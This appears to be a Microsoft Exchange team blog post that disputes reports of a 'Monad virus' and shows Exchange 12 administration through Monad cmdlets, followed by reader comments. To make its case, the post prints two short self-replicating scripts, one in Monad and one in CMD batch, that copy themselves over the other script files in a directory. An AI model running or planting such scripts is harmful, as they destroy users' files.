Exchange 12 and Monad


Recently, several articles have been written that Monad has been attacked by a virus and that Monad will be shipping with the next release of Exchange. I think there may have been a bit of confusion that I wanted to clear up.  Monad was not attacked by a virus, but they were right that the administration of the next release of Exchange has been completely re-written using Monad.

The reports describe a self replicating program, aka a “virus”, that just happens to be written in Monad. There was no exploit to get the script onto the machine, nor any exploit to get the scripts to run on that machine. The discovered “virus” does nothing to break through the secure shell experience (check out the linked blog entry for specifics) delivered by Monad.  The reported “virus” consisted of a simple script that copied itself on top of every other file in the current directory:

$name_array = get-childitem *.msh    
Foreach ($name in $name_array) {
  If ($name.Length – eq 255) {
    $my_file=$name.Name } }
Foreach ($victim in $name_array) {
  If ($victim.Length – ne 255 {
    Copy-item $my_file $victim.Name } }

But they could just have easily written as a CMD.EXE script:

for %%N in (“*.cmd”) do (
  if /I “%%N” NEQ “%0” (
    copy “%0” “%%N” > nul
  )
)

Beyond the security infrastructure built into Monad, I am very excited about what Monad brings to the Exchange admin experience. As background, Channel 9 recorded a great overview and demo of Monad. Just as Jeffrey discusses in his interview, we have re-built our admin graphical user experience entirely upon Monad cmdlets. Everything you can do through the GUI, can be done through the command line. And through the command line, you can do so much more. Consider these examples:

# Set the send quota for ALL mail enabled users in the DL called “RemoteUsers” to 1000 KB
Get-DistributionGroup “RemoteUsers” | Get-DistributionGroupMember | Set-Mailbox –ProhibitSendQuota 1000

# Mount all mailbox databases on server HONGKONG1
Get-MailboxDatabase –server HONGKONG1 | Mount-Database

# Only remove storage groups that contain the word “temp”, with confirmation support
Get-StorageGroup | where { $_.Name –imatch “temp” } | Remove-StorageGroup –confirm

# move ALL users from server PORTLAND to the TUCSON server, database “DB1”
Get-Mailbox –server PORTLAND | move-mailbox –targetDatabase “TUCSON\DB1”

As we get closer to Beta 1, we will be able to share more about Exchange 12. In the mean time, I hope this helps articulate this issue better and the direction Exchange is headed.

Terry Myerson
General Manager, Exchange Server

Comments (6)
  1. Adam Gates says:

    I had the pleasure of chatting with a "Monad"(def: 1. a person who gets technology info from yahoo/news, 2. a new way to use unix style commands with windows).

    They were convinced that the next version of Windows was based on monad.

    I did my best to explain what really happened unfortunately I think I might as well been talking to a cardboard cutout.

    HOW ABOUT A STRIPED DOWN SECURE VER OF WINDOWS?

    Remember DMS Exchange? Something like that. Be sure to include a "special thanks to Mr. A Gates" when you find all kind of people wanting to buy it.

  2. Jonathan Matthews-Levine says:

    Love the idea of chainable command line paths – reminds me of why I enjoy using the command line under *nix!

    I’m a bit concerned by the command "Remove-StorageGroup –confirm". Shouldn’t such a powerful and dangerous command have the inverse confirmation logic?

    In other words, default to "always confirm", /unless/ an argument is present? ("–no-confirm")

    Cheers,

    Jonathan

  3. Keith J. Farmer says:

    Will we be able to define sinks, etc in MSH?

  4. Vivek Sharma says:

    Jonathan:

    Monad actually has a policy (through setting a variable in your profile or startup file) that will allow you to switch this behaviour. You can make all cmdlets that support -confirm cofirm every time they are run. Feedback appreciated on what the default should be.

    Keith:

    Not currently, but great idea :)

  5. Anonymous says:

    A frequent topic of discussion with customers is the future of Public Folders, thus I think it would…

  6. Anonymous says:

    Last week, we signed off on E12 Beta 1. This is a great milestone for the product and the team. We’ve…

Comments are closed.